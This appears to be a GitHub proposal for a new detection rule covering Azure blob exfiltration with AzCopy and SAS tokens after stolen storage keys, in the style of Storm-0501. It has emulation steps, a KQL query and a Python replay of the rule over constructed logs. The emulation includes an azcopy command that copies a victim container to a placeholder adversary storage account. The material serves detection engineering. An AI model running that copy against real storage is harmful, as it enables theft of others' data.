[New Rule] Azure Storage Blob Retrieval via AzCopy with SAS Token #5178

@terrancedejesus

Description

Summary

Missing detection coverage for data exfiltration from blob storage leveraging AzCopy. AzCopy was used in an APT campaign by Storm-0501 after storage account keys were stolen. GetBlob is a common API operation recorded for retrieving blob objects, so we limit this to only SAS tokens being used for auth. Additionally, we set the rule type as New Terms on azure.platformlogs.properties.accountName, which is the storage account name; thus, if we haven't seen GetBlob to an object with a SAS token for this storage account in the last 7 days, flag it.

Requires diagnostic (platform) logs for visibility into READ operations on blob storage.

Emulation

Emulated this behavior in our Azure tenant (victim), exfiltrating to an Elastic Azure tenant (adversary).

  1. Set up victim infrastructure in the victim tenant:
    • Created a resource group and storage account
    • Created a blob container and uploaded sample data files
    • Configured diagnostic settings to stream Storage logs to Event Hub for monitoring
  2. Simulated credential theft:
    • Retrieved the victim storage account key (simulating adversary theft of credentials)
  3. Set up adversary infrastructure in a separate adversary tenant:
    • Created a resource group and storage account for data exfiltration
    • Created a blob container to receive exfiltrated data
  4. Generated SAS tokens (adversary actions):
    • Created a SAS token with read/list permissions for the victim storage container using the stolen account key
    • Created a SAS token with write permissions for the adversary storage container
  5. Performed data exfiltration using AzCopy:

    azcopy copy "https://<victim-storage>.blob.core.windows.net/<victim-container>?<victim-SAS-token>" \
                "https://<adversary-storage>.blob.core.windows.net/<adversary-container>?<adversary-SAS-token>" \
                --recursive

Ref: https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/

Query

event.dataset: azure.platformlogs and
    event.action: GetBlob and
    azure.platformlogs.identity.type: SAS and
    azure.platformlogs.properties.userAgentHeader: AzCopy* and
    azure.platformlogs.statusCode: 200
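To make the rule logic concrete, the following added example (not part of the PR or of the detection-rules repository) replays the query filter and an approximation of the New Terms behaviour over constructed, ECS-style flattened Azure platform log events. The field names are the ones from the query above; the `@timestamp` values, account names and user-agent strings are made up. An account name is flagged when a matching GetBlob/SAS/AzCopy/200 event arrives and no matching event for that account was seen within the preceding 7 days, which is the history window the summary describes.

```python
"""Replay of the proposed rule: KQL-style filter plus a New Terms check on
azure.platformlogs.properties.accountName with a 7-day history window.
Added example with constructed sample data; not Elastic's implementation."""
from datetime import datetime, timedelta

NEW_TERMS_WINDOW = timedelta(days=7)

# Constructed sample events (flattened dotted keys as an ECS pipeline would emit).
SAMPLE_LOGS = [
    {"@timestamp": "2025-09-01T10:00:00Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "SAS",
     "azure.platformlogs.properties.userAgentHeader": "AzCopy/10.21.0",
     "azure.platformlogs.statusCode": 200,
     "azure.platformlogs.properties.accountName": "victimstore"},
    # Same account five seconds later: already seen, must not alert again.
    {"@timestamp": "2025-09-01T10:00:05Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "SAS",
     "azure.platformlogs.properties.userAgentHeader": "AzCopy/10.21.0",
     "azure.platformlogs.statusCode": 200,
     "azure.platformlogs.properties.accountName": "victimstore"},
    # OAuth identity: legitimate AzCopy use by a signed-in principal, filtered out.
    {"@timestamp": "2025-09-02T09:00:00Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "OAuth",
     "azure.platformlogs.properties.userAgentHeader": "AzCopy/10.21.0",
     "azure.platformlogs.statusCode": 200,
     "azure.platformlogs.properties.accountName": "victimstore"},
    # Browser user agent with a SAS token: filtered out.
    {"@timestamp": "2025-09-03T09:00:00Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "SAS",
     "azure.platformlogs.properties.userAgentHeader": "Mozilla/5.0",
     "azure.platformlogs.statusCode": 200,
     "azure.platformlogs.properties.accountName": "victimstore"},
    # Failed read (403): the rule only wants successful retrievals.
    {"@timestamp": "2025-09-04T09:00:00Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "SAS",
     "azure.platformlogs.properties.userAgentHeader": "AzCopy/10.21.0",
     "azure.platformlogs.statusCode": 403,
     "azure.platformlogs.properties.accountName": "victimstore"},
    # Nine days after the last match for victimstore: outside the window, alerts.
    {"@timestamp": "2025-09-10T10:00:00Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "SAS",
     "azure.platformlogs.properties.userAgentHeader": "AzCopy/10.21.0",
     "azure.platformlogs.statusCode": 200,
     "azure.platformlogs.properties.accountName": "victimstore"},
    # Never-seen account name: alerts.
    {"@timestamp": "2025-09-10T11:00:00Z", "event.dataset": "azure.platformlogs",
     "event.action": "GetBlob", "azure.platformlogs.identity.type": "SAS",
     "azure.platformlogs.properties.userAgentHeader": "AzCopy/10.21.0",
     "azure.platformlogs.statusCode": 200,
     "azure.platformlogs.properties.accountName": "backupstore"},
]


def matches_query(event: dict) -> bool:
    """Mirror the KQL filter: GetBlob over SAS auth from AzCopy that succeeded."""
    user_agent = str(event.get("azure.platformlogs.properties.userAgentHeader") or "")
    return (
        event.get("event.dataset") == "azure.platformlogs"
        and event.get("event.action") == "GetBlob"
        and event.get("azure.platformlogs.identity.type") == "SAS"
        and user_agent.startswith("AzCopy")          # KQL wildcard AzCopy*
        and event.get("azure.platformlogs.statusCode") == 200
    )


def _parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def new_terms_alerts(events: list, window: timedelta = NEW_TERMS_WINDOW) -> list:
    """Return (timestamp, accountName) pairs for matching events whose storage
    account had no matching event within the preceding `window`."""
    last_seen: dict = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if not matches_query(ev):
            continue
        ts = _parse_ts(ev["@timestamp"])
        account = ev.get("azure.platformlogs.properties.accountName")
        previous = last_seen.get(account)
        if previous is None or ts - previous > window:
            alerts.append((ev["@timestamp"], account))
        last_seen[account] = ts
    return alerts


if __name__ == "__main__":
    for when, account in new_terms_alerts(SAMPLE_LOGS):
        print(f"ALERT {when} new SAS+AzCopy GetBlob source for account {account}")
```

Running the script prints three alerts: the first victimstore read, the victimstore read nine days later, and the backupstore read. The OAuth, browser and 403 events never reach the New Terms stage, which is the point of filtering on identity type, user agent and status code before tracking account names.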

Metadata

Labels

Rule: NewProposal for new rule
